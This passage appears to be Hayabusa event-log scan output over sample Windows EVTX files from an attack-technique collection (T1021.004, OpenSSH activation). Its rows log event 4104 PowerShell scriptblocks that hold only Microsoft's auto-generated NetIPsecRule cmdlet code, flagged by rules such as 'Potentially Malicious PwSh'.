= $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeli",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not 